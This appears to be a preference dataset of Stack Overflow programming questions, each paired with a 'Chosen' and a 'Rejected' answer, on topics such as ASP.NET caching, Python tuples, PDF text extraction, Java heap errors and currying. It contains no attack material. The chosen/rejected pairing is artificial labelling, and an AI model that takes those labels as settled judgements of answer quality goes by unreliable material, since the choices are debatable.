Prompt
stringlengths
10
31k
Chosen
stringlengths
3
29.4k
Rejected
stringlengths
3
51.1k
Title
stringlengths
9
150
Tags
listlengths
3
7
Recently I have been investigating the possibilities of caching in ASP.NET. I rolled my own "Cache", because I didn't know any better, it looked a bit like this: ``` public class DataManager { private static DataManager s_instance; public static DataManager GetInstance() { } private Data[] m_myData; private DataTime m_cacheTime; public Data[] GetData() { TimeSpan span = DateTime.Now.Substract(m_cacheTime); if(span.TotalSeconds > 10) { // Do SQL to get data m_myData = data; m_cacheTime = DateTime.Now; return m_myData; } else { return m_myData; } } } ``` So the values are stored for a while in a singleton, and when the time expires, the values are renewed. If time has not expired, and a request for the data is done, the stored values in the field are returned. What are the benefits over using the real method (<http://msdn.microsoft.com/en-us/library/aa478965.aspx>) instead of this?
I think the maxim "let the computer do it; it's smarter than you" applies here. Just like memory management and other complicated things, the computer is a lot more informed about what it's doing than your are; consequently, able to get more performance than you are. Microsoft has had a team of engineers working on it and they've probably managed to squeeze much more performance out of the system than would be possible for you to. It's also likely that ASP.NET's built-in caching operates at a different level (which is inaccessible to your application), making it much faster.
The ASP.NET caching mechanism has been around for a while, so it's stable and well understood. There are lots of resources out there to help you make the most of it. Rolling your own might be the right solution, depending on your requirements. The hard part about caching is choosing what is safe to cache, and when. For applications in which data changes frequently, you can introduce some hard to troubleshoot bugs with caching, so be careful.
ASP.NET Caching
[ "", "asp.net", "sql", "caching", "" ]
I am learning Python for a class now, and we just covered tuples as one of the data types. I read the Wikipedia page on it, but, I could not figure out where such a data type would be useful in practice. Can I have some examples, perhaps in Python, where an immutable set of numbers would be needed? How is this different from a list?
* Tuples are used whenever you want to return multiple results from a function. * Since they're immutable, they can be used as keys for a dictionary (lists can't).
Tuples make good dictionary keys when you need to combine more than one piece of data into your key and don't feel like making a class for it. ``` a = {} a[(1,2,"bob")] = "hello!" a[("Hello","en-US")] = "Hi There!" ``` I've used this feature primarily to create a dictionary with keys that are coordinates of the vertices of a mesh. However, in my particular case, the exact comparison of the floats involved worked fine which might not always be true for your purposes [in which case I'd probably convert your incoming floats to some kind of fixed-point integer]
What is a tuple useful for?
[ "", "python", "tuples", "" ]
Using ASP.NET MVC there are situations (such as form submission) that may require a `RedirectToAction`. One such situation is when you encounter validation errors after a form submission and need to redirect back to the form, but would like the URL to reflect the URL of the form, not the action page it submits to. As I require the form to contain the originally `POST`ed data, for user convenience, as well as validation purposes, how can I pass the data through the `RedirectToAction()`? If I use the viewData parameter, my `POST` parameters will be changed to `GET` parameters.
The solution is to use the TempData property to store the desired Request components. For instance: ``` public ActionResult Send() { TempData["form"] = Request.Form; return this.RedirectToAction(a => a.Form()); } ``` Then in your "Form" action you can go: ``` public ActionResult Form() { /* Declare viewData etc. */ if (TempData["form"] != null) { /* Cast TempData["form"] to System.Collections.Specialized.NameValueCollection and use it */ } return View("Form", viewData); } ```
Keep in mind that TempData stores the form collection in session. If you don't like that behavior, you can implement the new ITempDataProvider interface and use some other mechanism for storing temp data. I wouldn't do that unless you know for a fact (via measurement and profiling) that the use of Session state is hurting you.
How to RedirectToAction in ASP.NET MVC without losing request data
[ "", "c#", "asp.net-mvc", "" ]
Is there any python module to convert PDF files into text? I tried [one piece of code](http://code.activestate.com/recipes/511465/) found in Activestate which uses pypdf but the text generated had no space between and was of no use.
Try [PDFMiner](http://www.unixuser.org/~euske/python/pdfminer/index.html). It can extract text from PDF files as HTML, SGML or "Tagged PDF" format. The Tagged PDF format seems to be the cleanest, and stripping out the XML tags leaves just the bare text. A Python 3 version is available under: * <https://github.com/pdfminer/pdfminer.six>
The [PDFMiner](http://www.unixuser.org/~euske/python/pdfminer/index.html) package has changed since [codeape](https://stackoverflow.com/users/3571/codeape) posted. **EDIT (again):** PDFMiner has been updated again in version `20100213` You can check the version you have installed with the following: ``` >>> import pdfminer >>> pdfminer.__version__ '20100213' ``` Here's the updated version (with comments on what I changed/added): ``` def pdf_to_csv(filename): from cStringIO import StringIO #<-- added so you can copy/paste this to try it from pdfminer.converter import LTTextItem, TextConverter from pdfminer.pdfparser import PDFDocument, PDFParser from pdfminer.pdfinterp import PDFResourceManager, PDFPageInterpreter class CsvConverter(TextConverter): def __init__(self, *args, **kwargs): TextConverter.__init__(self, *args, **kwargs) def end_page(self, i): from collections import defaultdict lines = defaultdict(lambda : {}) for child in self.cur_item.objs: if isinstance(child, LTTextItem): (_,_,x,y) = child.bbox #<-- changed line = lines[int(-y)] line[x] = child.text.encode(self.codec) #<-- changed for y in sorted(lines.keys()): line = lines[y] self.outfp.write(";".join(line[x] for x in sorted(line.keys()))) self.outfp.write("\n") # ... the following part of the code is a remix of the # convert() function in the pdfminer/tools/pdf2text module rsrc = PDFResourceManager() outfp = StringIO() device = CsvConverter(rsrc, outfp, codec="utf-8") #<-- changed # becuase my test documents are utf-8 (note: utf-8 is the default codec) doc = PDFDocument() fp = open(filename, 'rb') parser = PDFParser(fp) #<-- changed parser.set_document(doc) #<-- added doc.set_parser(parser) #<-- added doc.initialize('') interpreter = PDFPageInterpreter(rsrc, device) for i, page in enumerate(doc.get_pages()): outfp.write("START PAGE %d\n" % i) interpreter.process_page(page) outfp.write("END PAGE %d\n" % i) device.close() fp.close() return outfp.getvalue() ``` **Edit (yet again):** Here is an update for the latest version in [pypi](http://pypi.python.org/pypi/pdfminer/), `20100619p1`. In short I replaced `LTTextItem` with `LTChar` and passed an instance of LAParams to the CsvConverter constructor. ``` def pdf_to_csv(filename): from cStringIO import StringIO from pdfminer.converter import LTChar, TextConverter #<-- changed from pdfminer.layout import LAParams from pdfminer.pdfparser import PDFDocument, PDFParser from pdfminer.pdfinterp import PDFResourceManager, PDFPageInterpreter class CsvConverter(TextConverter): def __init__(self, *args, **kwargs): TextConverter.__init__(self, *args, **kwargs) def end_page(self, i): from collections import defaultdict lines = defaultdict(lambda : {}) for child in self.cur_item.objs: if isinstance(child, LTChar): #<-- changed (_,_,x,y) = child.bbox line = lines[int(-y)] line[x] = child.text.encode(self.codec) for y in sorted(lines.keys()): line = lines[y] self.outfp.write(";".join(line[x] for x in sorted(line.keys()))) self.outfp.write("\n") # ... the following part of the code is a remix of the # convert() function in the pdfminer/tools/pdf2text module rsrc = PDFResourceManager() outfp = StringIO() device = CsvConverter(rsrc, outfp, codec="utf-8", laparams=LAParams()) #<-- changed # becuase my test documents are utf-8 (note: utf-8 is the default codec) doc = PDFDocument() fp = open(filename, 'rb') parser = PDFParser(fp) parser.set_document(doc) doc.set_parser(parser) doc.initialize('') interpreter = PDFPageInterpreter(rsrc, device) for i, page in enumerate(doc.get_pages()): outfp.write("START PAGE %d\n" % i) if page is not None: interpreter.process_page(page) outfp.write("END PAGE %d\n" % i) device.close() fp.close() return outfp.getvalue() ``` **EDIT (one more time):** Updated for version `20110515` (thanks to Oeufcoque Penteano!): ``` def pdf_to_csv(filename): from cStringIO import StringIO from pdfminer.converter import LTChar, TextConverter from pdfminer.layout import LAParams from pdfminer.pdfparser import PDFDocument, PDFParser from pdfminer.pdfinterp import PDFResourceManager, PDFPageInterpreter class CsvConverter(TextConverter): def __init__(self, *args, **kwargs): TextConverter.__init__(self, *args, **kwargs) def end_page(self, i): from collections import defaultdict lines = defaultdict(lambda : {}) for child in self.cur_item._objs: #<-- changed if isinstance(child, LTChar): (_,_,x,y) = child.bbox line = lines[int(-y)] line[x] = child._text.encode(self.codec) #<-- changed for y in sorted(lines.keys()): line = lines[y] self.outfp.write(";".join(line[x] for x in sorted(line.keys()))) self.outfp.write("\n") # ... the following part of the code is a remix of the # convert() function in the pdfminer/tools/pdf2text module rsrc = PDFResourceManager() outfp = StringIO() device = CsvConverter(rsrc, outfp, codec="utf-8", laparams=LAParams()) # becuase my test documents are utf-8 (note: utf-8 is the default codec) doc = PDFDocument() fp = open(filename, 'rb') parser = PDFParser(fp) parser.set_document(doc) doc.set_parser(parser) doc.initialize('') interpreter = PDFPageInterpreter(rsrc, device) for i, page in enumerate(doc.get_pages()): outfp.write("START PAGE %d\n" % i) if page is not None: interpreter.process_page(page) outfp.write("END PAGE %d\n" % i) device.close() fp.close() return outfp.getvalue() ```
Python module for converting PDF to text
[ "", "python", "pdf", "text-extraction", "pdf-scraping", "" ]
I am writing a client-side **Swing** application (graphical font designer) on **Java 5**. Recently, I am running into `java.lang.OutOfMemoryError: Java heap space` error because I am not being conservative on memory usage. The user can open unlimited number of files, and the program keeps the opened objects in the memory. After a quick research I found [Ergonomics in the 5.0 Java Virtual Machine](http://java.sun.com/docs/hotspot/gc5.0/ergo5.html) and others saying on Windows machine the JVM defaults max heap size as `64MB`. Given this situation, how should I deal with this constraint? I could increase the **max heap size** using **command line** option to java, but that would require figuring out available RAM and writing some launching program or script. Besides, increasing to some **finite** max does not **ultimately** get rid of the issue. I could rewrite some of my code to persist objects to file system frequently (using database is the same thing) to free up the memory. It could work, but it's probably a lot work too. If you could point me to details of above ideas or some alternatives like **automatic virtual memory, extending heap size dynamically**, that will be great.
Ultimately you always have a finite max of heap to use no matter what platform you are running on. In Windows 32 bit this is around `2GB` (not specifically heap but total amount of memory per process). It just happens that Java chooses to make the default smaller (presumably so that the programmer can't create programs that have runaway memory allocation without running into this problem and having to examine exactly what they are doing). So this given there are several approaches you could take to either determine what amount of memory you need or to reduce the amount of memory you are using. One common mistake with garbage collected languages such as Java or C# is to keep around references to objects that you **no longer** are using, or allocating many objects when you could **reuse** them instead. As long as objects have a reference to them they will continue to use heap space as the garbage collector will not delete them. In this case you can use a Java memory profiler to determine what methods in your program are allocating large number of objects and then determine if there is a way to make sure they are no longer referenced, or to not allocate them in the first place. One option which I have used in the past is "JMP" <http://www.khelekore.org/jmp/>. If you determine that you are allocating these objects for a reason and you need to keep around references (depending on what you are doing this might be the case), you will just need to increase the max heap size when you start the program. However, once you do the memory profiling and understand how your objects are getting allocated you should have a better idea about how much memory you need. In general if you can't guarantee that your program will run in some finite amount of memory (perhaps depending on input size) you will always run into this problem. Only after exhausting all of this will you need to look into caching objects out to disk etc. At this point you should have a very good reason to say "I need Xgb of memory" for something and you can't work around it by improving your algorithms or memory allocation patterns. Generally this will only usually be the case for algorithms operating on large datasets (like a database or some scientific analysis program) and then techniques like caching and memory mapped IO become useful.
Run Java with the command-line option `-Xmx`, which sets the *maximum* size of the heap. [See here for details](http://docs.oracle.com/javase/7/docs/technotes/tools/windows/java.html#nonstandard).
How to deal with "java.lang.OutOfMemoryError: Java heap space" error?
[ "", "java", "jvm", "out-of-memory", "heap-memory", "" ]
I have my Wordpress install and MediaWiki [sharing the same login information](https://stackoverflow.com/questions/33745 "Thanks ceejayoz"). Unfortunately, users need to log into both separately, but at least they use the same credentials. What I would like to do is cause a successful login on the Wordpress blog to also cause a login for MediaWiki (ideally both directions). There are two ways this could happen: 1. Logging in causes a login on the other application (writes the cookie and creates the session in the DB) 2. Accessing an application checks for the cookie of the other and then automatically logs in. Since the usernames are shared it seems like the latter should be pretty easy to do. Any tips would be great.
They both support [OpenId](http://openid.net/) now. * [MediaWiki's extension](http://www.mediawiki.org/wiki/Extension:OpenID) * [WordPress's plugin](http://wordpress.org/extend/plugins/openid/) There are probably other options for using OpenId, but I think that is the best solution available.
The primary problem you are going to run into is that you'll have two login forms, and two logout methods. What you need to do is pick one of the login forms as the default, and redirect the other one over to it. I've been able to [successfully integrate](http://www.howtogeek.com) bbPress + MediaWiki + WordPress + WordPress MU, but I wrote a lot of custom code to do it. I'm using the bbPress login page as the default (and .htaccess rewrite to /login/), and then I created my own MediaWiki authentication plugin (which looks a lot like the one you are using), except my plugin checks the WordPress/bbPress cookie for the login information and automatically logs the user in. I created a customized /logout/ link that runs the bbPress logout, and also kills the MediaWiki cookies at the same time. Then the last step was to redirect all of the other logout / login links for bbpress, mediawiki, etc, over to my consolidated one. I used .htaccess rewrites for this rather than mess with core code. Still a work in progress, but it works fairly well.
Wordpress MediaWiki Cookie Integration
[ "", "php", "wordpress", "lamp", "mediawiki", "" ]
If I create a class like so: ``` // B.h #ifndef _B_H_ #define _B_H_ class B { private: int x; int y; }; #endif // _B_H_ ``` and use it like this: ``` // main.cpp #include <iostream> #include <vector> class B; // Forward declaration. class A { public: A() { std::cout << v.size() << std::endl; } private: std::vector<B> v; }; int main() { A a; } ``` The compiler fails when compiling `main.cpp`. Now the solution I know is to `#include "B.h"`, but I'm curious as to why it fails. Neither `g++` or `cl`'s error messages were very enlightening in this matter.
The compiler needs to know how big "B" is before it can generate the appropriate layout information. If instead, you said `std::vector<B*>`, then the compiler wouldn't need to know how big B is because it knows how big a pointer is.
In fact your example would build if A's constructor were implemented in a compile unit that knows the type of B. An std::vector instance has a fixed size, no matter what T is, since it contains, as others said before, only a pointer to T. But the vector's constructor depends on the concrete type. Your example doesn't compile because A() tries to call the vector's ctor, which can't be generated without knowing B. Here's what would work: A's declaration: ``` // A.h #include <vector> class B; // Forward declaration. class A { public: A(); // only declare, don't implement here private: std::vector<B> v; }; ``` A's implementation: ``` // A.cpp #include "A.h" #include "B.h" A::A() // this implicitly calls vector<B>'s constructor { std::cout << v.size() << std::endl; } ``` Now a user of A needs to know only A, not B: ``` // main.cpp #include "A.h" int main() { A a; // compiles OK } ```
Why can't a forward declaration be used for a std::vector?
[ "", "c++", "stl", "" ]
Is there a function like `document.getElementById("FirstDiv").clear()`?
To answer the original question - there are various ways to do this, but the following would be the simplest. If you already have a handle to the child node that you want to remove, i.e. you have a JavaScript variable that holds a reference to it: ``` myChildNode.parentNode.removeChild(myChildNode); ``` Obviously, if you are not using one of the numerous libraries that already do this, you would want to create a function to abstract this out: ``` function removeElement(node) { node.parentNode.removeChild(node); } ``` --- EDIT: As has been mentioned by others: if you have any event handlers wired up to the node you are removing, you will want to make sure you disconnect those before the last reference to the node being removed goes out of scope, lest poor implementations of the JavaScript interpreter leak memory.
If you want to clear the div and remove all child nodes, you could put: ``` var mydiv = document.getElementById('FirstDiv'); while(mydiv.firstChild) { mydiv.removeChild(mydiv.firstChild); } ```
How can I remove a child node in HTML using JavaScript?
[ "", "javascript", "html", "dom", "" ]
We've just started using LINQ to SQL at work for our DAL & we haven't really come up with a standard for out caching model. Previously we had being using a base 'DAL' class that implemented a cache manager property that all our DAL classes inherited from, but now we don't have that. I'm wondering if anyone has come up with a 'standard' approach to caching LINQ to SQL results? We're working in a web environment (IIS) if that makes a difference. I know this may well end up being a [subjective](https://stackoverflow.com/questions/tagged/subjective) question, but I still think the info would be valuable. **EDIT:** To clarify, I'm not talking about caching an individual result, I'm after more of an architecture solution, as in how do you set up caching so that all your link methods use the same caching architecture.
A quick answer: Use the Repository pattern (see Domain Driven Design by Evans) to fetch your entities. Each repository will cache the things it will hold, ideally by letting each instance of the repository access a singleton cache (each thread/request will instantiate a new repository but there can be only one cache). The above answer works on one machine only. To be able to use this on many machines, use [memcached](http://memcached.org/) as your caching solution. Good luck!
My [LINQ query result cache](http://petemontgomery.wordpress.com/2008/08/07/caching-the-results-of-linq-queries/) is probably just what you're looking for. ``` var q = from c in context.Customers where c.City == "London" select new { c.Name, c.Phone }; var result = q.Take(10).FromCache(); ``` Pete.
How do you implement caching in Linq to SQL?
[ "", ".net", "sql", "linq-to-sql", "iis", "caching", "" ]
I have a website that plays mp3s in a flash player. If a user clicks 'play' the flash player automatically downloads an mp3 and starts playing it. Is there an easy way to track how many times a particular song clip (or any binary file) has been downloaded? --- > Is the play link a link to the actual > mp3 file or to some javascript code > that pops up a player? > > If the latter, you can easily add your > own logging code in there to track the > number of hits to it. > > If the former, you'll need something > that can track the web server log > itself and make that distinction. My > hosting plan comes with Webalizer, > which does this nicely. It's a javascript code so that answers that. However, it would be nice to know how to track downloads using the other method (without switching hosts).
The funny thing is I wrote a php media gallery for all my musics 2 days ago. I had a similar problem. I'm using <http://musicplayer.sourceforge.net/> for the player. And the playlist is built via php. All music requests go to a script called xfer.php?file=WHATEVER ``` $filename = base64_url_decode($_REQUEST['file']); header("Cache-Control: public"); header('Content-disposition: attachment; filename='.basename($filename)); header("Content-Transfer-Encoding: binary"); header('Content-Length: '. filesize($filename)); // Put either file counting code here, either a db or static files // readfile($filename); //and spit the user the file function base64_url_decode($input) { return base64_decode(strtr($input, '-_,', '+/=')); } ``` And when you call files use something like: ``` function base64_url_encode($input) { return strtr(base64_encode($input), '+/=', '-_,'); } ``` <http://us.php.net/manual/en/function.base64-encode.php> If you are using some JavaScript or a flash player (JW player for example) that requires the actual link of an mp3 file or whatever, you can append the text "&type=.mp3" so the final link becomes something like: "www.example.com/xfer.php?file=34842ffjfjxfh&type=.mp3". That way it looks like it ends with an mp3 extension without affecting the file link.
Use your httpd log files. Install <http://awstats.sourceforge.net/>
How do I track file downloads
[ "", "php", "apache", "logging", "download", "analytics", "" ]
I was just wondering if there is an elegant way to set the maximum CPU load for a particular thread doing intensive calculations. Right now I have located the most time-consuming loop in the thread (it does only compression) and use `GetTickCount()` and `Sleep()` with hardcoded values. It makes sure that the loop continues for a certain period and then sleeps for a certain minimum time. It more or less does the job, i.e. guarantees that the thread will not use more than 50% of CPU. However, behavior is dependent on the number of CPU cores (huge disadvantage) and simply ugly (smaller disadvantage). Any ideas?
I am not aware of any API to do get the OS's scheduler to do what you want (even if your thread is idle-priority, if there are no higher-priority ready threads, yours will run). However, I think you can improvise a fairly elegant throttling function based on what you are already doing. Essentially (I don't have a Windows dev machine handy): Pick a default amount of time the thread will sleep each iteration. Then, on each iteration (or on every nth iteration, such that the throttling function doesn't itself become a significant CPU load), 1. Compute the amount of CPU time your thread used since the last time your throttling function was called (I'll call this dCPU). You can use the [GetThreadTimes()](http://msdn.microsoft.com/en-us/library/ms683237.aspx) API to get the amount of time your thread has been executing. 2. Compute the amount of real time elapsed since the last time your throttling function was called (I'll call this dClock). 3. dCPU / dClock is the percent CPU usage (of one CPU). If it is higher than you want, increase your sleep time, if lower, decrease the sleep time. 4. Have your thread sleep for the computed time. Depending on how your watchdog computes CPU usage, you might want to use [GetProcessAffinityMask()](http://msdn.microsoft.com/en-us/library/ms683213(VS.85).aspx) to find out how many CPUs the system has. dCPU / (dClock \* CPUs) is the percentage of total CPU time available. You will still have to pick some magic numbers for the initial sleep time and the increment/decrement amount, but I think this algorithm could be tuned to keep a thread running at fairly close to a determined percent of CPU.
On linux, you can change the scheduling priority of a thread with nice().
CPU throttling in C++
[ "", "c++", "performance", "cpu", "throttling", "" ]
In many places, `(1,2,3)` (a tuple) and `[1,2,3]` (a list) can be used interchangeably. When should I use one or the other, and why?
From the [Python FAQ](http://www.python.org/doc/faq/general/#why-are-there-separate-tuple-and-list-data-types): > Lists and tuples, while similar in many respects, are generally used in fundamentally different ways. Tuples can be thought of as being similar to Pascal records or C structs; they're small collections of related data which may be of different types which are operated on as a group. For example, a Cartesian coordinate is appropriately represented as a tuple of two or three numbers. > > Lists, on the other hand, are more like arrays in other languages. They tend to hold a varying number of objects all of which have the same type and which are operated on one-by-one. Generally by convention you wouldn't choose a list or a tuple just based on its (im)mutability. You would choose a tuple for small collections of completely different pieces of data in which a full-blown class would be too heavyweight, and a list for collections of any reasonable size where you have a homogeneous set of data.
The list `[1,2,3]` is dynamic and flexible but that flexibility comes at a speed cost. The tuple `(1,2,3)` is fixed (immutable) and therefore faster.
Python: what is the difference between (1,2,3) and [1,2,3], and when should I use each?
[ "", "python", "list", "tuples", "" ]
I've seen references to curried functions in several articles and blogs but I can't find a good explanation (or at least one that makes sense!)
Currying is when you break down a function that takes multiple arguments into a series of functions that each take only one argument. Here's an example in JavaScript: ``` function add (a, b) { return a + b; } add(3, 4); // returns 7 ``` This is a function that takes two arguments, a and b, and returns their sum. We will now curry this function: ``` function add (a) { return function (b) { return a + b; } } ``` This is a function that takes one argument, `a`, and returns a function that takes another argument, `b`, and that function returns their sum. ``` add(3)(4); // returns 7 var add3 = add(3); // returns a function add3(4); // returns 7 ``` * The first statement returns 7, like the `add(3, 4)` statement. * The second statement defines a new function called `add3` that will add 3 to its argument. (This is what some may call a closure.) * The third statement uses the `add3` operation to add 3 to 4, again producing 7 as a result.
In an algebra of functions, dealing with functions that take multiple arguments (or equivalent one argument that's an N-tuple) is somewhat inelegant -- but, as Moses Schönfinkel (and, independently, Haskell Curry) proved, it's not needed: all you need are functions that take one argument. So how do you deal with something you'd naturally express as, say, `f(x,y)`? Well, you take that as equivalent to `f(x)(y)` -- `f(x)`, call it `g`, is a function, and you apply that function to `y`. In other words, you only have functions that take one argument -- but some of those functions return other functions (which ALSO take one argument;-). As usual, [wikipedia](http://en.wikipedia.org/wiki/Currying) has a nice summary entry about this, with many useful pointers (probably including ones regarding your favorite languages;-) as well as slightly more rigorous mathematical treatment.
What is 'Currying'?
[ "", "javascript", "functional-programming", "terminology", "definition", "currying", "" ]
It seems that a List object cannot be stored in a List variable in C#, and can't even be explicitly cast that way. ``` List<string> sl = new List<string>(); List<object> ol; ol = sl; ``` results in Cannot implicitly convert type `System.Collections.Generic.List<string>` to `System.Collections.Generic.List<object>` And then... ``` List<string> sl = new List<string>(); List<object> ol; ol = (List<object>)sl; ``` results in Cannot convert type `System.Collections.Generic.List<string>` to `System.Collections.Generic.List<object>` Of course, you can do it by pulling everything out of the string list and putting it back in one at a time, but it is a rather convoluted solution.
Think of it this way, if you were to do such a cast, and then add an object of type Foo to the list, the list of strings is no longer consistent. If you were to iterate the first reference, you would get a class cast exception because once you hit the Foo instance, the Foo could not be converted to string! As a side note, I think it would be more significant whether or not you can do the reverse cast: ``` List<object> ol = new List<object>(); List<string> sl; sl = (List<string>)ol; ``` I haven't used C# in a while, so I don't know if that is legal, but that sort of cast is actually (potentially) useful. In this case, you are going from a more general class (object) to a more specific class (string) that extends from the general one. In this way, if you add to the list of strings, you are not violating the list of objects. Does anybody know or can test if such a cast is legal in C#?
If you're using .NET 3.5 have a look at the Enumerable.Cast method. It's an extension method so you can call it directly on the List. ``` List<string> sl = new List<string>(); IEnumerable<object> ol; ol = sl.Cast<object>(); ``` It's not exactly what you asked for but should do the trick. Edit: As noted by Zooba, you can then call ol.ToList() to get a List
In C#, why can't a List<string> object be stored in a List<object> variable
[ "", "c#", ".net", "generics", "covariance", "type-safety", "" ]
I have a "Status" class in C#, used like this: ``` Status MyFunction() { if(...) // something bad return new Status(false, "Something went wrong") else return new Status(true, "OK"); } ``` You get the idea. All callers of MyFunction *should* check the returned Status: ``` Status myStatus = MyFunction(); if ( ! myStatus.IsOK() ) // handle it, show a message,... ``` Lazy callers however can ignore the Status. ``` MyFunction(); // call function and ignore returned Status ``` or ``` { Status myStatus = MyFunction(); } // lose all references to myStatus, without calling IsOK() on it ``` Is it possible to make this impossible? e.g. an throw exception **In general**: is it possible to write a C# class on which you *have* to call a certain function? In the C++ version of the Status class, I can write a test on some private bool bIsChecked in the *destructor* and ring some bells when someone doesn't check this instance. What is the equivalent option in C#? I read somewhere that "You don't want a destructor in your C# class" Is the Dispose method of the IDisposable interface an option? In this case there are no unmanaged resources to free. Additionally, it is not determined *when* the GC will dispose the object. When it eventually gets disposed, is it still possible to know where and when you ignored that specific Status instance? The "using" keyword does help, but again, it is not *required* for lazy callers.
I am fairly certain you can't get the effect you want as a return value from a method. C# just can't do some of the things C++ can. However, a somewhat ugly way to get a similar effect is the following: ``` using System; public class Example { public class Toy { private bool inCupboard = false; public void Play() { Console.WriteLine("Playing."); } public void PutAway() { inCupboard = true; } public bool IsInCupboard { get { return inCupboard; } } } public delegate void ToyUseCallback(Toy toy); public class Parent { public static void RequestToy(ToyUseCallback callback) { Toy toy = new Toy(); callback(toy); if (!toy.IsInCupboard) { throw new Exception("You didn't put your toy in the cupboard!"); } } } public class Child { public static void Play() { Parent.RequestToy(delegate(Toy toy) { toy.Play(); // Oops! Forgot to put the toy away! }); } } public static void Main() { Child.Play(); Console.ReadLine(); } } ``` In the very simple example, you get an instance of Toy by calling Parent.RequestToy, *and passing it a delegate*. Instead of returning the toy, the method immediately calls the delegate with the toy, which must call PutAway before it returns, or the RequestToy method will throw an exception. I make no claims as to the wisdom of using this technique -- indeed in all "something went wrong" examples an exception is almost certainly a better bet -- but I think it comes about as close as you can get to your original request.
I know this doesn't answer your question directly, but if "something went wrong" within your function (unexpected circumstances) I think you should be throwing an exception rather than using status return codes. Then leave it up to the caller to catch and handle this exception if it can, or allow it to propogate if the caller is unable to handle the situation. The exception thrown could be of a custom type if this is appropriate. For *expected* alternative results, I agree with @Jon Limjap's suggestion. I'm fond of a bool return type and prefixing the method name with "Try", a la: ``` bool TryMyFunction(out Status status) { } ```
Enforcing required function call
[ "", "c#", "garbage-collection", "dispose", "destructor", "" ]
I am currently working on a project with specific requirements. A brief overview of these are as follows: * Data is retrieved from external webservices * Data is stored in SQL 2005 * Data is manipulated via a web GUI * The windows service that communicates with the web services has no coupling with our internal web UI, except via the database. * Communication with the web services needs to be both time-based, and triggered via user intervention on the web UI. The current (pre-pre-production) model for web service communication triggering is via a database table that stores trigger requests generated from the manual intervention. I do not really want to have multiple trigger mechanisms, but would like to be able to populate the database table with triggers based upon the time of the call. As I see it there are two ways to accomplish this. 1) Adapt the trigger table to store two extra parameters. One being "Is this time-based or manually added?" and a nullable field to store the timing details (exact format to be determined). If it is a manaully created trigger, mark it as processed when the trigger has been fired, but not if it is a timed trigger. *or* 2) Create a second windows service that creates the triggers on-the-fly at timed intervals. The second option seems like a fudge to me, but the management of option 1 could easily turn into a programming nightmare (how do you know if the last poll of the table returned the event that needs to fire, and how do you then stop it re-triggering on the next poll) I'd appreciate it if anyone could spare a few minutes to help me decide which route (one of these two, or possibly a third, unlisted one) to take.
Why not use a SQL Job instead of the Windows Service? You can encapsulate all of you db "trigger" code in Stored Procedures. Then your UI and SQL Job can call the same Stored Procedures and create the triggers the same way whether it's manually or at a time interval.
The way I see it is this. You have a Windows Service, which is playing the role of a scheduler and in it there are some classes which simply call the webservices and put the data in your databases. So, you can use these classes directly from the WebUI as well and import the data based on the WebUI trigger. I don't like the idea of storing a user generated action as a flag (trigger) in the database where some service will poll it (at an interval which is not under the user's control) to execute that action. You could even convert the whole code into an exe which you can then schedule using the Windows Scheduler. And call the same exe whenever the user triggers the action from the Web UI.
Timer-based event triggers
[ "", "sql", "web-services", "service", "triggers", "timer", "" ]
I have a web service that I created in C# and a test harness that was provided by my client. Unfortunately my web service doesn't seem to be parsing the objects created by the test harness. I believe the problem lies with serializing the soap packet. Using TCPTrace I was able to get the soap packet passed to the web service but only on a remote machine so I can't debug it there. Is there a way of calling my local webservice with the soap packet generated rather than my current test harness where I manually create objects and call the web service through a web reference? [edit] The machine that I got the soap packet was on a vm so I can't link it to my machine. I suppose I'm looking for a tool that I can paste the soap packet into and it will in turn call my web service
A somewhat manual process would be to use the [Poster](http://code.google.com/p/poster-extension/) add-in for Firefox. There is also a java utility called [SoapUI](http://sourceforge.net/project/showfiles.php?group_id=136013&package_id=163662&release_id=500134) that has some discovery based automated templates that you can then modify and run against your service.
By default, .Net will not allow you to connect a packet analyzer like TCPTrace or Fiddler (which I prefer) to localhost or 127.0.0.1 connections (for reasons that I forget now..) Best way would be to reference your web services via a full IP address or FQDN where possible. That will allow you to trace the calls in the tool of your choice.
Debugging Web Service with SOAP Packet
[ "", "c#", "web-services", "soap", "tcptrace-pocketsoap", "" ]
I'd like to have a java.utils.Timer with a resettable time in java.I need to set a once off event to occur in X seconds. If nothing happens in between the time the timer was created and X seconds, then the event occurs as normal. If, however, before X seconds has elapsed, I decide that the event should occur after Y seconds instead, then I want to be able to tell the timer to reset its time so that the event occurs in Y seconds. E.g. the timer should be able to do something like: ``` Timer timer = new Timer(); timer.schedule(timerTask, 5000); //Timer starts in 5000 ms (X) //At some point between 0 and 5000 ms... setNewTime(timer, 8000); //timerTask will fire in 8000ms from NOW (Y). ``` I don't see a way to do this using the utils timer, as if you call cancel() you cannot schedule it again. The only way I've come close to replicating this behavior is by using javax.swing.Timer and involves stopping the origional timer, and creating a new one. i.e.: ``` timer.stop(); timer = new Timer(8000, ActionListener); timer.start(); ``` Is there an easier way??
According to the [`Timer`](http://java.sun.com/javase/6/docs/api/java/util/Timer.html) documentation, in Java 1.5 onwards, you should prefer the [`ScheduledThreadPoolExecutor`](http://java.sun.com/javase/6/docs/api/java/util/concurrent/ScheduledThreadPoolExecutor.html) instead. (You may like to create this executor using [`Executors`](http://java.sun.com/javase/6/docs/api/java/util/concurrent/Executors.html)`.newSingleThreadScheduledExecutor()` for ease of use; it creates something much like a `Timer`.) The cool thing is, when you schedule a task (by calling `schedule()`), it returns a [`ScheduledFuture`](http://java.sun.com/javase/6/docs/api/java/util/concurrent/ScheduledFuture.html) object. You can use this to cancel the scheduled task. You're then free to submit a new task with a different triggering time. ETA: The `Timer` documentation linked to doesn't say anything about `ScheduledThreadPoolExecutor`, however the [OpenJDK](http://openjdk.java.net/) version had this to say: > Java 5.0 introduced the `java.util.concurrent` package and > one of the concurrency utilities therein is the > `ScheduledThreadPoolExecutor` which is a thread pool for repeatedly > executing tasks at a given rate or delay. It is effectively a more > versatile replacement for the `Timer`/`TimerTask` > combination, as it allows multiple service threads, accepts various > time units, and doesn't require subclassing `TimerTask` (just > implement `Runnable`). Configuring > `ScheduledThreadPoolExecutor` with one thread makes it equivalent to > `Timer`.
